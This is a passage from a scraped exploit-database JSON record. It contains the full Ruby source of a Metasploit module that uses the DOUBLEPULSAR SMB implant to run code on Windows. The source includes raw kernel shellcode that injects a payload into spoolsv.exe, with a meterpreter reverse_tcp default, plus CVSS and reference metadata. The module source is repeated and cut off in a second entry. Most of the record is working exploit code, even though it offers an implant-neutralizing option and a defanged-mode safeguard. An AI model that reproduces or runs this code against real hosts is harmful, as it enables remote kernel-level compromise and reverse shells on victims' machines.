Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-05] #"}, "lastseen": "2021-10-05T00:15:19", "differentElements": ["sourceData"], "edition": 35}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "6c736d7fc5237a32c9b43e1605b2f89a", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0146", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0147", "CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-10-05T22:17:33", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690"]}, {"type": "zdt", "idList": ["1337DAY-ID-29702", "1337DAY-ID-27802", "1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33895"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:42030", "EDB-ID:47456", "EDB-ID:43970"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96704", "SMNTC-96706", "SMNTC-96707", "SMNTC-96705", "SMNTC-96709"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"]}, {"type": "threatpost", "idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0143", "MS:CVE-2017-0145"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:9EF85E0CE1D118D27911357B1C516074"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-05T22:17:33", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-10-05T22:17:33", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 